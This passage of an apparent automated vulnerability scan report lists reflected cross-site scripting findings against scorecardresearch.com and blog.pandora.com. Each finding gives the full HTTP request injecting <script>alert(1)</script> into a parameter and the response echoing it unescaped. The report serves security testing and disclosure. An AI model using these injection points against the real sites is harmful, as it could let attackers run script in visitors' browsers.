Date: Sun, 09 Jan 2011 02:02:11 GMT
Connection: close
Content-Length: 3591

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
unction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404ae5ba<script>alert(1)</script>adbfd959a51", c3:"9", c4:"4762", c5:"", c6:"", c10:"164121", c15:"", c16:"", r:""});

3.11. http://b.scorecardresearch.com/beacon.js [c3 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload c8a72<script>alert(1)</script>d9a8abda3bb was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=9c8a72<script>alert(1)</script>d9a8abda3bb&c4=4762&c5=&c6=&c10=164121&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 16 Jan 2011 02:02:11 GMT
Date: Sun, 09 Jan 2011 02:02:11 GMT
Connection: close
Content-Length: 3591

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"9c8a72<script>alert(1)</script>d9a8abda3bb", c4:"4762", c5:"", c6:"", c10:"164121", c15:"", c16:"", r:""});

3.12. http://b.scorecardresearch.com/beacon.js [c4 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload c4c5b<script>alert(1)</script>45d5c6bad11 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=9&c4=4762c4c5b<script>alert(1)</script>45d5c6bad11&c5=&c6=&c10=164121&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 16 Jan 2011 02:02:12 GMT
Date: Sun, 09 Jan 2011 02:02:12 GMT
Connection: close
Content-Length: 3591

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"9", c4:"4762c4c5b<script>alert(1)</script>45d5c6bad11", c5:"", c6:"", c10:"164121", c15:"", c16:"", r:""});

3.13. http://b.scorecardresearch.com/beacon.js [c5 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 5bdff<script>alert(1)</script>d89896135b9 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=9&c4=4762&c5=5bdff<script>alert(1)</script>d89896135b9&c6=&c10=164121&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 16 Jan 2011 02:02:13 GMT
Date: Sun, 09 Jan 2011 02:02:13 GMT
Connection: close
Content-Length: 3591

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"9", c4:"4762", c5:"5bdff<script>alert(1)</script>d89896135b9", c6:"", c10:"164121", c15:"", c16:"", r:""});

3.14. http://b.scorecardresearch.com/beacon.js [c6 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload dcd0e<script>alert(1)</script>d6e3eca22a6 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=9&c4=4762&c5=&c6=dcd0e<script>alert(1)</script>d6e3eca22a6&c10=164121&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 16 Jan 2011 02:02:13 GMT
Date: Sun, 09 Jan 2011 02:02:13 GMT
Connection: close
Content-Length: 3591

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"9", c4:"4762", c5:"", c6:"dcd0e<script>alert(1)</script>d6e3eca22a6", c10:"164121", c15:"", c16:"", r:""});

3.15. http://blog.pandora.com/faq [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/faq

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cc76e<script>alert(1)</script>bcb67c3cc6e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /faqcc76e<script>alert(1)</script>bcb67c3cc6e HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:07:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 327

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /faqcc76e<script>alert(1)</script>bcb67c3cc6e was not found on this server.</p>
...[SNIP]...

3.16. http://blog.pandora.com/faq/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/faq/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c9edc<script>alert(1)</script>e1d9afc7813 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /faqc9edc<script>alert(1)</script>e1d9afc7813/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:58 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 328

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /faqc9edc<script>alert(1)</script>e1d9afc7813/ was not found on this server.</p>
...[SNIP]...

3.17. http://blog.pandora.com/faq/index.xml [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/faq/index.xml

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 21a51<script>alert(1)</script>fb51523ad13 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /faq21a51<script>alert(1)</script>fb51523ad13/index.xml HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 337

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /faq21a51<script>alert(1)</script>fb51523ad13/index.xml was not found on this server.</p>
...[SNIP]...

3.18. http://blog.pandora.com/faq/index.xml [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/faq/index.xml

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d7f75<script>alert(1)</script>8dac30374f8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /faq/index.xmld7f75<script>alert(1)</script>8dac30374f8 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:33 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 337

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /faq/index.xmld7f75<script>alert(1)</script>8dac30374f8 was not found on this server.</p>
...[SNIP]...

3.19. http://blog.pandora.com/jobs [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/jobs

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1bab7<script>alert(1)</script>a6fd1a47986 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jobs1bab7<script>alert(1)</script>a6fd1a47986 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:07:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 328

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /jobs1bab7<script>alert(1)</script>a6fd1a47986 was not found on this server.</p>
...[SNIP]...

3.20. http://blog.pandora.com/pandora/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8a2e2<script>alert(1)</script>bf577de6d6e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora8a2e2<script>alert(1)</script>bf577de6d6e/ HTTP/1.1
Host: blog.pandora.com
Proxy-Connection: keep-alive
Referer: http://blog.pandora.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.7.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:34 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 332

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora8a2e2<script>alert(1)</script>bf577de6d6e/ was not found on this server.</p>
...[SNIP]...

3.21. http://blog.pandora.com/pandora/archives/2005/07/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2005/07/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 95a59<script>alert(1)</script>8e7980713e3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora95a59<script>alert(1)</script>8e7980713e3/archives/2005/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:27 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora95a59<script>alert(1)</script>8e7980713e3/archives/2005/07/ was not found on this server.</p>
...[SNIP]...

3.22. http://blog.pandora.com/pandora/archives/2005/07/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2005/07/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4a534<script>alert(1)</script>8a298db320 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives4a534<script>alert(1)</script>8a298db320/2005/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:29 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 348

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives4a534<script>alert(1)</script>8a298db320/2005/07/ was not found on this server.</p>
...[SNIP]...

3.23. http://blog.pandora.com/pandora/archives/2005/07/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2005/07/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8b191<script>alert(1)</script>638b7d947db was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20058b191<script>alert(1)</script>638b7d947db/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:32 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20058b191<script>alert(1)</script>638b7d947db/07/ was not found on this server.</p>
...[SNIP]...

3.24. http://blog.pandora.com/pandora/archives/2005/07/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2005/07/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6552d<script>alert(1)</script>a04c546c7c1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2005/076552d<script>alert(1)</script>a04c546c7c1/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:35 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2005/076552d<script>alert(1)</script>a04c546c7c1/ was not found on this server.</p>
...[SNIP]...

3.25. http://blog.pandora.com/pandora/archives/2005/08/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2005/08/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1adf9<script>alert(1)</script>84f161db5a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora1adf9<script>alert(1)</script>84f161db5a2/archives/2005/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:26 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora1adf9<script>alert(1)</script>84f161db5a2/archives/2005/08/ was not found on this server.</p>
...[SNIP]...

3.26. http://blog.pandora.com/pandora/archives/2005/08/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2005/08/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 55147<script>alert(1)</script>0105bf04052 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives55147<script>alert(1)</script>0105bf04052/2005/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives55147<script>alert(1)</script>0105bf04052/2005/08/ was not found on this server.</p>
...[SNIP]...

3.27. http://blog.pandora.com/pandora/archives/2005/08/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
